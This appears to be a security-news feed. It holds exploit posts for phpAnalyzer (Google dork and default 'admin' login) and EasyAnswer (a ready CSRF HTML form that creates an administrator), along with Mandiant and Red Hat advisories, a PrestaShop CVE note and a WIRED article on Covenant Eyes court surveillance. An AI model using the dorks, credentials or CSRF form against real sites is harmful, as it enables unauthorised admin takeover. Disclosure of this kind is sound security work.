phpAnalyzer version 2.0.4 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : phpAnalyzer v2.0.4 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/phpanalyzer-instagram-audit-report-tool/21933992                                       |  | # Dork      : "Copyright © phpAnalyzer.com. All rights reserved. Product by AltumCode"                                           |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use user & pass : admin[+] http://127.0.0.1/phpAnalyzer/adminGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

phpAnalyzer 2.0.4 Insecure Settings

EasyAnswer version 1.0.1 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : EasyAnswer version 1.0.1 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit)                                            |   
| # Vendor    : https://www.codester.com/items/40311/                                                                              |    
| # Dork      : "© 2022 Easy Answer All rights reserved."                                                                          |  
====================================================================================================================================

poc :

[+] infected file: admins-create.php

[+] Inside folder /admin/admins-create.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

 </i>Create Administrator</h2>  
                  </div>  
                </div>  
              </div>  
            </div>  
          </div>

                    <div class="row">  
            <div class="col-md-12 stretch-card">  
              <div class="card">

                              <div class="card-body">

                                <div id="messages">  
                                 </div>

                 <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">  
                 <input type="hidden" id="submitform" name="submitform" value="1">

                                  <div class="form-group row">  
                      <label for="username" class="col-sm-2 col-form-label">Username:</label>  
                      <div class="col-sm-12">  
                        <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">  
                      </div>  
                 </div>  
                 <div class="form-group row">  
                      <label for="password" class="col-sm-2 col-form-label">Password:</label>  
                      <div class="col-sm-12">  
                        <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">  
                      </div>  
                 </div>

                                  <div class="form-group row">  
                      <label for="email" class="col-sm-2 col-form-label">E-Mail:</label>  
                      <div class="col-sm-12">  
                        <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">  
                      </div>  
                 </div>

                                  <div class="row-spaces"></div>

                                  <p>  
                  <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>  
                 </p>  
                </form>

                                              </div>  
             </div>  
            </div>  
           </div>

                           </div>

    Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

EasyAnswer 1.0.1 Cross Site Request Forgery

TP-Link EC-70 devices through 2.3.4 Build 20220902 rel.69498 have a Buffer Overflow.

**MNDT-2023-0006****Description**

A Stack-based Buffer Overflow exists in TP-Link's Kasa EC70 Security Camera handling of authenication credentials.

**Impact**

High - Exploiting the vulnerability will give a network connected attacker a root shell on the device.

**Exploitability**

High - Requires access to the same network, but otherwise an user can exploit the vulnerability and an exploit is simple to produce.

**CVE Reference**

CVE-2023-28478

**Common Vulnerability Scoring System**

Base Score: 8.8 - Vector: AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The TP-Link EC-70 (Kasa Spot Pan Tilt) wireless security camera contains an exploitable stack-based buffer overflow in the Authentication header of multiple services, allowing an unauthenticated attacker on the same network to execute arbitrary code as the 'root' user on the device. Specifically, the tpsocket_base64_decode() function does not perform any bounds checking while decoding the supplied password value into a fixed length buffer stored on the stack in the authentication callback function for the media-serviced (tcp/19443), ulinkied (tcp/10443), speaker (tcp/18443), and storaged (tcp/17443) services.

In order to reach the vulnerable code, an attacker needs to know the username associated with the device. This information can be obtained by requesting smartlife.cam.ipcamera.cloud get\_info method in a UDP packet to port 9999. The returned encoded json contains the username as one of the fields. Encoding and decoding the blobs is trivial, as the TP-Link Smart Home Protocol has been documented.

The Authentication header data is base64 decoded, and if the content before the first ':' character doesn't match the username, the authentication callback returns failure immediately. Otherwise an MD5 hash of the data following the first ':' character is checked against the MD5 of the current password. If this does match, then the callback returns success, otherwise the password data is base64 decoded again, and this value is hashed and checked against the current password, this time into a 128-byte long stack-based buffer. The tpsocket_base64_decode() function does not have a parameter for the maximum output length, and is often used in the code to decode "in place", overwriting the original buffer. When used with a fixed length buffer to decode untrusted input, an exploitable buffer overflow can occur.

**Resolution**

The issue is fixed in version 2.3.20 Build 20230424 rel.58785, which can be installed by upgrading the firmware on the device (if it has not already automatically updated).

**Discovery Credits**

*   Greg MacManus, Google Cloud + Mandiant, FLARE OTF

**Disclosure Timeline**

*   16-Mat-2023 - Issue reported to TP-Link
*   19-Mar-2023 - Patched version provided for testing
*   25-Apr-2023 - Requested update on status.
*   26-Apr-2023 - Early May release date estimated.
*   6-Jun-2023 - Requested update on status.
*   8-Jun-2023 - TP-Link reports fixed version has been released.

**References**

*   Mitre CVE-2023-28478

CVE-2023-28478: Vulnerability-Disclosures/MNDT-2023-0006.md at master · mandiant/Vulnerability-Disclosures

Logging Subsystem 5.7.2 - Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-41723: A flaw was found in golang. A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.
* CVE-2023-27539: A denial of service vulnerability was found in rubygem-rack in how it parses headers. A carefully crafted input can cause header parsing to take an unexpected amount of time, possibly resulting in a denial of service.
* CVE-2023-28120: A Cross-Site-Scripting vulnerability was found in rubygem ActiveSupport. If the new bytesplice method is called on a SafeBuffer with untrusted user input, malicious code could be executed.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Publié :

2023-06-12

Mis à jour :

2023-06-12

**RHSA-2023:3495 - Security Advisory**

*   Aperçu général
*   Updated Images

**Synopsis**

Moderate: Logging Subsystem 5.7.2 - Red Hat OpenShift security update

**Type / Sévérité**

Security Advisory: Moderate

**Sujet**

Logging Subsystem 5.7.2 - Red Hat OpenShift  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Logging Subsystem 5.7.2 - Red Hat OpenShift  

Security Fix(es):  

*   net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding (CVE-2022-41723)
*   rubygem-rack: denial of service in header parsing (CVE-2023-27539)
*   rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice (CVE-2023-28120)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Produits concernés**

*   Logging Subsystem for Red Hat OpenShift for ARM 64 5 for RHEL 8 aarch64
*   Logging Subsystem for Red Hat OpenShift 5 for RHEL 8 x86\_64
*   Logging Subsystem for Red Hat OpenShift for IBM Power, little endian 5 for RHEL 8 ppc64le
*   Logging Subsystem for Red Hat OpenShift for IBM Z and LinuxONE 5 for RHEL 8 s390x

**Correctifs**

*   BZ - 2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding
*   BZ - 2179637 - CVE-2023-28120 rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice
*   BZ - 2179649 - CVE-2023-27539 rubygem-rack: denial of service in header parsing
*   LOG-3316 - openshift-logging namespace can not be deleted directly when use lokistack as default store.
*   LOG-3330 - run.sh shows incorrect chunk\_limit\_size if changed.
*   LOG-3749 - Unability to configure nodePlacement and toleration for logging-view-plugin
*   LOG-3784 - \[fluentd http\] the defaut value HTTP content type application/x-ndjson is unsupported on datadog
*   LOG-3878 - \[vector\] PHP multiline errors are collected line by line when detectMultilineErrors is enabled.
*   LOG-3945 - \[Vector\] Collector pods in CrashLoopBackOff when ClusterLogForwarder pipeline has space in between the pipeline name.
*   LOG-3997 - Add http to log\_forwarder\_output\_info metrics
*   LOG-4019 - \[release-5.7\] fluentd multiline exception plugin fails to detect JS client exception
*   LOG-4049 - \[release-5.7\] User can list labels and label values for all user workload namespaces via Loki Label APIs
*   LOG-4163 - \[release-5.7\] TLS configuration for multiple Kafka brokers is not created in Vector
*   LOG-3314 - \[fluentd\] The passphrase can not be enabled when forwarding logs to Kafka
*   LOG-3445 - \[vector to loki\] validation is not disabled when tls.insecureSkipVerify=true
*   LOG-3827 - \[fluentd http\] The passphase isn't generated in fluent.conf
*   LOG-4011 - \[Vector\] Collector not complying with the custom tlsSecurityProfile configuration.
*   LOG-4052 - \[release-5.7\] Fix Loki timeouts querying logs from OCP Console
*   LOG-4098 - \[release-5.7\] No log\_forwarder\_output\_info for splunk and google logging
*   LOG-4151 - Fluentd fix missing nil check for rotated\_tw in update\_watcher
*   LOG-4185 - Resources, tolerations and nodeSelector for the collector are missing
*   LOG-4218 - Vector fails to run when configuring syslog forwarding for audit log
*   LOG-4219 - Vector handles journal log as container log when enabling syslog forwarding. It breaks the compatibility with Fluentd
*   LOG-4220 - \[RHOCP4.11\] Logs of POD which doesn't have labels specified by structuredTypeKey are parsed to JSON, and forwarded to app-xxxxxx
*   LOG-4221 - \[release-5.7\] Fluentd wrongly closes a log file due to hash collision

**CVE**

*   CVE-2021-26341
*   CVE-2021-33655
*   CVE-2021-33656
*   CVE-2022-1462
*   CVE-2022-1679
*   CVE-2022-1789
*   CVE-2022-2196
*   CVE-2022-2663
*   CVE-2022-3028
*   CVE-2022-3239
*   CVE-2022-3522
*   CVE-2022-3524
*   CVE-2022-3564
*   CVE-2022-3566
*   CVE-2022-3567
*   CVE-2022-3619
*   CVE-2022-3623
*   CVE-2022-3625
*   CVE-2022-3627
*   CVE-2022-3628
*   CVE-2022-3707
*   CVE-2022-3970
*   CVE-2022-4129
*   CVE-2022-20141
*   CVE-2022-25147
*   CVE-2022-25265
*   CVE-2022-30594
*   CVE-2022-36227
*   CVE-2022-39188
*   CVE-2022-39189
*   CVE-2022-41218
*   CVE-2022-41674
*   CVE-2022-41723
*   CVE-2022-42703
*   CVE-2022-42720
*   CVE-2022-42721
*   CVE-2022-42722
*   CVE-2022-43750
*   CVE-2022-47929
*   CVE-2023-0394
*   CVE-2023-0461
*   CVE-2023-1195
*   CVE-2023-1582
*   CVE-2023-2491
*   CVE-2023-22490
*   CVE-2023-23454
*   CVE-2023-23946
*   CVE-2023-25652
*   CVE-2023-25815
*   CVE-2023-27535
*   CVE-2023-27539
*   CVE-2023-28120
*   CVE-2023-29007

**aarch64**

openshift-logging/cluster-logging-rhel8-operator@sha256:8619dafc0e4d978c2eb63e0dbb0389114bbf93c692dc1477ed776c40e589c677

openshift-logging/elasticsearch-proxy-rhel8@sha256:22a97db8a595aaa758027b30c7fd2cf3ea0ae6c4d0b70766f8124d8eb17b58c9

openshift-logging/elasticsearch-rhel8-operator@sha256:ab54ef61832141f7675d3dc8d59edf99c3cdd1125c74e222492949c180964452

openshift-logging/elasticsearch6-rhel8@sha256:9c28c1ef4a26ab31a9de8941b22705cea8e85918df5e9997cd07ede5bd04e512

openshift-logging/eventrouter-rhel8@sha256:62134203e3d02a92b4ea0f0f6b96a4046806c655f9b8358de7576a57624a7574

openshift-logging/fluentd-rhel8@sha256:c082515ff5bcaaf305b24d24b488b2d91627894872b2f2074f7bfa64e0baf313

openshift-logging/kibana6-rhel8@sha256:77a3146e462f9291ea13d13fea97c74b2d59fe84f3dbfc33aafc08837fe5baba

openshift-logging/log-file-metric-exporter-rhel8@sha256:92ff40e217abff467a201e45ebb11330d5352a29d7be3703048a865c7a7aa603

openshift-logging/logging-curator5-rhel8@sha256:d3df7e62f2b1893b4f4879b91531b92652547aa4453fd1bfdc9558ff5a720a84

openshift-logging/logging-loki-rhel8@sha256:16c8e2bf0d537e9a787f2250203f9deae1b5f0f0b28e0520ddf6bf9b9c2e04d7

openshift-logging/logging-view-plugin-rhel8@sha256:50742d41afd16c553729523d8e5e5a6640a2bb9d2d01eb4d18051456bdb422f7

openshift-logging/loki-rhel8-operator@sha256:0f762d2a6e7e98b8d1a35df4a3d81677507dd2aea8a7c413aaa268bef2fbbe56

openshift-logging/lokistack-gateway-rhel8@sha256:59113b0585d5f2ad0e2c61220ec3ead6192e14868f6dd9c143af5d13e6235565

openshift-logging/opa-openshift-rhel8@sha256:456a76e7ef5687b45ade9360670c2e3793d38cbca5e132763850a7cfd0861811

openshift-logging/vector-rhel8@sha256:30e6149c0c834f785066f790655e67d17cb71ed68aa79dd7e4f2b7e3b8db8aa3

**ppc64le**

openshift-logging/cluster-logging-rhel8-operator@sha256:ae56b7bb5f88e54739e103c16b57eb776661c8942d0d58dae683f33dc839191a

openshift-logging/elasticsearch-proxy-rhel8@sha256:0abd84da4fd5bf4f2657c0a7ba2f8fd8b878c15121fccbe8fb5f461b2ea5a9b3

openshift-logging/elasticsearch-rhel8-operator@sha256:5aaa60e772fd3f47d7b12d12c2eb55176803175656f834c48ed5003bf6c80600

openshift-logging/elasticsearch6-rhel8@sha256:4685b2792af31c22d64220aaf7693e121826fdc2d8acd5be7bd0557995b8dea0

openshift-logging/eventrouter-rhel8@sha256:f8ff9fda083e55a5113ba614c739d83d52ee3115429075d0eb03fea2e9d5d711

openshift-logging/fluentd-rhel8@sha256:5dd0468121013d75c3c5b5def726b6d71f66d2086defad6cc1d54015f057f956

openshift-logging/kibana6-rhel8@sha256:c8dff12b758f72cb6096c83a9b0e4918efab24e41c60e3dd1db91b561a204a9f

openshift-logging/log-file-metric-exporter-rhel8@sha256:d5b2f702c19854620778f1a99c07e18c94ad2fd510b8484d2ac53c6ae8c0a8e2

openshift-logging/logging-curator5-rhel8@sha256:12c1aafdb570d4a58c89d12d50dc129ee6f1eeb2a67d3e05a2a23d96d7d17d9c

openshift-logging/logging-loki-rhel8@sha256:8b3fdd7f5b498336eff6881c742c59a2f6acdaaaf0ed80141d66170c19e6dfa7

openshift-logging/logging-view-plugin-rhel8@sha256:ef63d4524f60a38ec8b4ec306f94ac865397d2f1616cdad7ed11722c49b9565e

openshift-logging/loki-rhel8-operator@sha256:214c8f4d86ff90cfddafa93dc1c3d5b3304bbfa35d3aec0b5aff30265f988f16

openshift-logging/lokistack-gateway-rhel8@sha256:0d9c0ccdf55842f06ed98efecba60e6614f764bb7e1dbe5861971e8ba8c80404

openshift-logging/opa-openshift-rhel8@sha256:9e5ca10fd6967fa319fcba97aed737c4bdbbad6fbe19e43bc86010e89132669f

openshift-logging/vector-rhel8@sha256:7f3f463d22450c505c9a2ac6cca844b2d8a6124379e10beeab2ec8381dad913e

**s390x**

openshift-logging/cluster-logging-rhel8-operator@sha256:60f75c6ae180291f7e8eae0dd9999f0c17a74863b20d23f45a675cb427cabcf8

openshift-logging/elasticsearch-proxy-rhel8@sha256:160985f4c009f8cce7b36c1142756f25ff2413937da194facc6bc85cb0863551

openshift-logging/elasticsearch-rhel8-operator@sha256:fa36283092c27cd60761703d1eee07b92358dfe1157273b51b37b583a6060b35

openshift-logging/elasticsearch6-rhel8@sha256:cc65e3adf0590cd58a073f351be36a2bc60ea1aa0183a0c9dcb9ae726830a078

openshift-logging/eventrouter-rhel8@sha256:05c5123b3c5757f6239327c7ee96d2ce9fecbeef1dc39feade38d9417941122d

openshift-logging/fluentd-rhel8@sha256:9e35721ad22c9c67e6bd49f7978c495d72743ad43c21425cb97a57b5f6d03653

openshift-logging/kibana6-rhel8@sha256:be0b14bae5a4e42bb760ef93676153d2e9d0eaa72075b745df29ab519223a226

openshift-logging/log-file-metric-exporter-rhel8@sha256:cf228007b8ef6af94bee09d300d4c9917162041b08a91b0556e4083976050b5f

openshift-logging/logging-curator5-rhel8@sha256:5c0cf908612a36333722f5fed31e266a398db32739dd2e4f074428877b363c85

openshift-logging/logging-loki-rhel8@sha256:fcb11d3e6cc848ca774d353117c6a5c4770d455f8a64bce1223296d0afc298ef

openshift-logging/logging-view-plugin-rhel8@sha256:29aaf15b222d1204253f4f82f3e17015a3fe77b3106580628442316bc2b2d26e

openshift-logging/loki-rhel8-operator@sha256:62a71fd5ea0d3c6c26f06a56795ecca801f1a0ab570f08dfc44bd9b534775e58

openshift-logging/lokistack-gateway-rhel8@sha256:b46f89c08df34b8ad7f2af805be0e005d9dfdfd94a0fbee6f5820200752ae11e

openshift-logging/opa-openshift-rhel8@sha256:543213dd4f0132d51e5823f4bb9ee450b90e85c10bb817475f03404a430c7706

openshift-logging/vector-rhel8@sha256:3c659bcf727aca2adff20087b41a5467cc52de825409df3468edb7e9c90fab41

**x86\_64**

openshift-logging/cluster-logging-operator-bundle@sha256:67922a4fa417673d97eca28344c77ba81d4f77cb1b86e1ca532b41a82b6f6520

openshift-logging/cluster-logging-rhel8-operator@sha256:c127a5211070607bc6daaa404fb221a91134ee18261691041448fb18203e711b

openshift-logging/elasticsearch-operator-bundle@sha256:f56e69a40c6f51da46fbaf3fd170f84e20a45bac6c77b3b6d16130ae7be62394

openshift-logging/elasticsearch-proxy-rhel8@sha256:38404132fe318e05f607c0e0ffb78baa25bb9477f53f40436b0cc50d21dd52bb

openshift-logging/elasticsearch-rhel8-operator@sha256:61c30851d3d9f544c37c7616ec8a4ba34b7b37f3555960d0c8fa2be78f44947f

openshift-logging/elasticsearch6-rhel8@sha256:611cef3b88e71c24f002e3a37de6883f54ca0e8eb9f8b60aff41ab2dcb249745

openshift-logging/eventrouter-rhel8@sha256:9a9fc94b921453a383a8e2503bb8ff4e1d5290a541d5819ea15b263f10589357

openshift-logging/fluentd-rhel8@sha256:3d3d4d46d57443ea5aea72a711126ff46b217129f089864f027b1ed2b45e393c

openshift-logging/kibana6-rhel8@sha256:fc848aa0f5d0bd6c39b6d3056c21ae82839bcd627bd06312d7243b4e830d8aa2

openshift-logging/log-file-metric-exporter-rhel8@sha256:ad3988a61bd088e3303a28fa823b5a6377d823de2ab12e0b3e490c082077f7b5

openshift-logging/logging-curator5-rhel8@sha256:d65d8fba95e2313eb97a925c2d4f2a76d3616626c492803d19dcc3548753ecfa

openshift-logging/logging-loki-rhel8@sha256:63fffa75040e8322e895f230431f2cee966909d4afc2fef28f694f154c0cf888

openshift-logging/logging-view-plugin-rhel8@sha256:cf64b884e6198327d0ed02a86971cd777a12591a3a6ad677703268d22f510bdd

openshift-logging/loki-operator-bundle@sha256:5667ef8d640391c34ac20562b91a1f723005673d96e54a6ba1d178fa2fa73a32

openshift-logging/loki-rhel8-operator@sha256:1861142f6d9581e572d3086037d5b8264906579df63e7b3ae91f70a3068842f8

openshift-logging/lokistack-gateway-rhel8@sha256:9d5bc7af72f5ef08b1b01f9d34da16ed47a6e65dd632cf369c5848c5e89bfb10

openshift-logging/opa-openshift-rhel8@sha256:549c0984ba0cc9a54d01f44c2554da6574c16967c87e1a72e3f773802c76f63d

openshift-logging/vector-rhel8@sha256:b63c5ae18c8b759e5e093d92801563355d5b45b85c997a8c294096ef2596615d

Le contact Red Hat Security est secalert@redhat.com. Plus d'infos contact à https://access.redhat.com/security/team/contact/.

RHSA-2023:3495: Red Hat Security Advisory: Logging Subsystem 5.7.2 - Red Hat OpenShift security update

Prestashop winbizpayment <= 1.0.2 is vulnerable to Incorrect Access Control via modules/winbizpayment/downloads/download.php.

CVE-2023-30198: PrestaShop/Tools.php at 6c05518b807d014ee8edb811041e3de232520c28 · PrestaShop/PrestaShop

A court used an app called Covenant Eyes to surveil the family of a man released on bond. Now he’s back in jail, and tech misuse may be to blame.

On a Wednesday morning in May, Hannah got a call from her lawyer—there was a warrant out for her husband’s arrest. Her thoughts went straight to her kids. They were going to come home from school and their father would be gone. “It burned me,” Hannah says, her voice breaking. “He hasn’t done anything to get his bond revoked, and they couldn’t prove he had.”

Hannah’s husband is now awaiting trial in jail, in part because of an anti-pornography app called Covenant Eyes. The company explicitly says the app is not meant for use in criminal proceedings, but the probation department in Indiana’s Monroe County has been using it for the past month to surveil not only Hannah’s husband but also the devices of everyone in their family. To protect their privacy, WIRED is not disclosing their surname or the names of individual family members. Hannah agreed to use her nickname.

Prosecutors in Monroe County this spring charged Hannah’s husband with possession of child sexual abuse material—a serious crime that she says he did not commit and to which he pleaded not guilty. Given the nature of the charges, the court ordered that he not have access to any electronic devices as a condition of his pretrial release from jail. To ensure he complied with those terms, the probation department installed Covenant Eyes on Hannah’s phone, as well as those of her two children and her mother-in-law. 

In near real time, probation officers are being fed screenshots of everything Hannah’s family views on their devices. From images of YouTube videos watched by her 14-year-old daughter to online underwear purchases made by her 80-year-old mother-in-law, the family’s entire digital life is scrutinized by county authorities. “I’m afraid to even communicate with our lawyer,” Hannah says. “If I mention anything about our case, I’m worried they are going to see it and use it against us.”

Covenant Eyes is part of a multimillion-dollar market of “accountability” apps sold to churches and parents as a tool to police online activity. For a monthly fee, the app monitors every single thing a user does on their devices, then sends the data it collects, including screenshots, to an “ally” or “accountability partner,” who can review the user’s online activities.

For Hannah’s family, their Covenant Eyes “allies” are two probation officers in Monroe County’s Pretrial Services Program charged with scrutinizing their web activity and ensuring that Hannah’s husband does not violate the terms of his bond while using one of his family members’ devices.

Covenant Eyes doesn’t permit its software to be used in a “premeditated legal setting,” such as monitoring people on probation, according to its terms of service. But public spending documents, court records, and interviews show that courts in at least five US states have used Covenant Eyes to surveil the devices of people who are awaiting trial or released on parole.  

Neither Covenant Eyes nor multiple officials in Monroe County responded to repeated requests for comment and detailed questions about the app’s monitoring.

While the use of Covenant Eyes in a criminal-legal setting likely only represents a tiny fraction of the hundreds of thousands of people under court-ordered electronic surveillance, the stakes are still high for those required to use it. The app’s accuracy could determine whether a loved one lives at home or behind bars. Legal experts say that its use raises serious constitutional and due process concerns.  

“This is the most extreme type of monitoring that I’ve seen,” says Pilar Weiss, founder of the National Bail Fund Network, a network of over 90 community bail and bond funds across the United States. “It’s part of a disturbing trend where deep surveillance and social control applications are used pretrial with little oversight.”

“It Felt Like Entrapment”

The Covenant Eyes app was developed by Michael Holm, a former National Security Agency mathematician who now works as a data scientist for the company. It captures everything visible on a device’s screen, taking at least one screenshot per minute.  It then analyzes the screenshots locally before slightly blurring them and saving them on a server. Images the system marks as possibly “explicit” are flagged for further review. For example, one Covenant Eyes report sent to Hannah’s probation officer, which WIRED reviewed, flagged an online advertisement for a back brace that included a woman in a tank top as “potentially concerning.” 

The app also monitors every network request a device makes, blocking allegedly pornographic content and alerting allies about requests the software deems suspicious.

The day her husband was released on bond, Hannah sat down with their kids and tried to explain how all of their devices were going to be monitored: The probation department would see anything they looked at on their phones and assume it was their father using the device. The constant surveillance had an immediate impact on the family, Hannah says.

Hannah began skipping her online therapy sessions, fearing that the probation officers would snoop on what she told her doctor. She says her 12-year-old son approached her a half-dozen times to ask things like, “Mom, will Pocket Mortys get dad in trouble?” Her daughter was afraid to text with her friends, worrying that if she used bad language, her father could end up in jail. “It was like the family was being charged with a crime,” Hannah says. “It felt like entrapment.” 

While the images in the Covenant Eyes reports that WIRED reviewed are partially blurred, it is sometimes possible to discern sensitive information from them. For instance, one Covenant Eyes report shows a screenshot of Hannah’s mother-in-law’s device while a phone call was in progress. The report clearly shows the name of the person being contacted. Another shows screenshots of Hannah’s mother-in-law’s bank statements and her Gmail inbox, although the sensitive details in both are unreadable.

Covenant Eyes doesn’t just block pornography. Though the app is designed to block traffic to adult sites, Hannah shared reports that show she was unable to access The Appeal, a nonprofit news organization that focuses on injustice in the criminal-legal system. 

Molly Greene, The Appeal’s strategy and legal director, calls the censorship alarming. “It’s incredibly concerning to hear readers say they can no longer access our website as a result of this app,” she says. ​​“This kind of abuse of judicial power to restrict people’s autonomy and ability to access critical information on the criminal legal system is exactly why The Appeal exists.”

Less than a week after Covenant Eyes was installed on the four phones in her household, Hannah got a call from her husband’s probation officer saying that her husband had violated the terms of his bond. According to Hannah, the officer said Covenant Eyes detected that her phone had visited Pornhub. Court records WIRED reviewed cite a visit to the adult website as the reason for revoking his bond.

But Hannah claims that her husband didn’t touch her phone and that no one had visited Pornhub. Instead, she says, her phone had made a network request to the website’s servers as part of a background app refresh from a frequently visited tab on her Chrome browser.

WIRED tested Hannah’s claims that Covenant Eyes flags background network activity from websites that aren’t intentionally viewed. Using an iPhone, we visited Pornhub enough times that it was a frequently visited tab on Google Chrome. We then installed Covenant Eyes and restarted our phone. Within minutes, Covenant Eyes alerted our designated accountability partner that a request to Pornhub was made from our test device, even though we never touched it. 

This is a known issue with Covenant Eyes. The alert Covenant Eyes sent when it detected a network request to Pornhub explicitly stated that the software cannot determine if the user “intentionally viewed” the webpage because “some apps generate activity in the background without the member’s consent.” The company has public documentation about the shortcoming. 

This limitation in Covenant Eyes means it’s possible Hannah’s husband did not violate the terms of his bond. Moreover, the terms of her husband’s bond don’t prohibit Hannah from looking at pornography, and it would be impossible for probation officers to know who was using the device from Covenant Eyes reports alone. Yet, in the motion to revoke Hannah’s husband’s bond, the only evidence prosecutors presented was information from the Covenant Eyes report.

According to Kate Weisburd, an associate professor at George Washington University School of Law, challenging probation and parole violations is difficult, particularly when they’re based on electronic evidence. Courts are largely reluctant to find due process problems with electronic surveillance, she says, and overworked defense attorneys often lack the capacity to bring a challenge.

Hannah printed the Covenant Eyes documentation and hand-delivered it to the prosecutors, the judge, and the probation department. She never heard back. As a last resort, Hannah emailed Covenant Eyes CEO Ron DeHaas. In an email exchange Hannah shared with WIRED, DeHaas was apologetic. “Hannah, I’m sorry that you are going through this,” DeHaas wrote. “I will have our legal department follow up with you.”

Hannah says the legal department never reached out.

Constitutional Wrongs

Jonathan Manes, an attorney at the MacArthur Justice Center’s Illinois office, says the surveillance Hannah’s family faces likely violates several of their constitutional rights. “This feels like an extraordinarily intrusive violation of the family’s First Amendment rights to be able to access the internet and communicate without being monitored,” he says. Manes adds that because the software effectively enables continuous and suspicionless searches of the devices of people who haven’t been charged with a crime, the family’s Fourth Amendment rights were potentially violated. 

Lastly, Manes points out that by indiscriminately surveilling whatever the phone is displaying, the app could collect sensitive data that includes the family’s communications with their lawyers, as Hannah feared. “It’s interfering with his right to speak in confidence with his attorney,” he says of Hannah’s husband. “It’s impeding his ability to prepare a defense and exercise that Sixth Amendment right.”

“This strikes me as quite chilling,” Manes adds. “It’s what happens when someone’s home becomes their jail cell, and now everyone they live with is subject to the same kind of surveillance as the person who is charged.”

Several legal experts expressed concern about the monitoring conditions imposed by the judge in Hannah’s husband’s case. But Phyllis Emerick, the chief deputy public defender in Monroe County, argues that because Hannah’s husband and his family consented to the surveillance, they gave up their rights to privacy. “He agreed that he would not access electronic devices in his household in exchange for release,” she says. “It was the family’s choice to continue living with him.”

Weiss, of the National Bail Fund Network, disagrees with the idea that any type of surveillance is permissible so long as a person agrees to it to avoid jail time. “Sure, they consented to this, but it’s at the barrel of a gun,” she says. 

The exact number of individuals or families in Monroe County who have been required to use Covenant Eyes as part of their pretrial release is unclear. In the county’s annual report from 2021, the Probation Department stated that they provided pretrial monitoring for 618 individuals; however, the report does not provide details about the specific type of monitoring involved. The number of individuals who were assigned to be monitored by Covenant Eyes is likely a small percentage of that.

Deputy probation officer Troy Hatfield would not answer specific questions about either Covenant Eyes or Hannah’s husband’s case, but he says the conditions of any defendant’s supervision are ultimately decided by the judge based on the specific facts of each case and department policy.  

Neither Monroe’s chief probation officer, Linda Brady, nor the judge in Hannah’s husband’s case, Mary Ellen Diekhoff, responded to repeated requests for interviews.

It’s also unclear exactly how many jurisdictions in the US  have used Covenant Eyes. Court records WIRED reviewed show that courts in Washington, Montana, and Ohio have each ordered a defendant to use the software at least once. In all of these cases, the defendant faced charges related to child sexual abuse material or child exploitation. In Colorado, spending records show that the State Judicial Branch has purchased services from Covenant Eyes 60 times since 2017. 

Multiple probation officer associations, public defense organizations, and bail funds WIRED contacted had never heard of the software and were unfamiliar with any screen-monitoring software being used for pretrial monitoring.

